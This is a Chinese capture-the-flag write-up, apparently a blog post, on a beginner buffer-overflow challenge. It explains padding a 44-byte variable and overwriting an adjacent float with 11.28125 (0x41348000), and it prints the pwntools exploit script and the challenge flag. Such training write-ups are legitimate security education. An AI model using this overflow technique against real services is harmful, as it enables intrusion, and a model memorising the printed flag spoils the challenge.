文章讲述了作者在面对一道编程挑战时,使用IDA64进行反编译,发现存在栈溢出漏洞。通过填充字符和特定浮点数11.28125,实现对变量空间的控制,最终成功获取flag的过程。对新手来说,理解十六进制数据方向和浮点数在汇编中的运用是难点。
天命:开始上难度了,一题做一天
把程序丢进IDA64位反编译,直怼main函数
前两个函数都没看懂,但func函数看懂了,有栈溢出函数
这题原来有两种解法,可是只研究透了第一种,第二种是实在看不懂
第一种方法就是利用栈溢出漏洞把存满v1的地址继续存到v2那里,
v1随便丢点字符塞满,v2放入浮点数 11.28125,下面逻辑就能跑通,就能打印flag了
对于新手来说是最难理解的部分了,左边的30是特么的16进制,也就是十进制的48个字节
这里拿到数据存入的方向是从上到下,也就是先存满v1变量:总共 48个字节 - 44个字节
再来到v2变量的空间,这时候把浮点数放进去就可以了
就可以替换掉v2的内容了
浮点数就是需要是:11.28125,在汇编指令里找找就有
from pwn import *
# 建立连接
p = remote('node5.buuoj.cn','25391')
# 48字节-4字节是v1的空间,先占满
# 然后再把浮点数加上去
payload = (b'a'* (48-4) ) + p64(0x41348000)
# 发送payload
p.sendline(payload)
# 保持连接
p.interactive()flag{d05b8098-ada5-4db0-9341-b78093154eca}
扫一扫
672
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
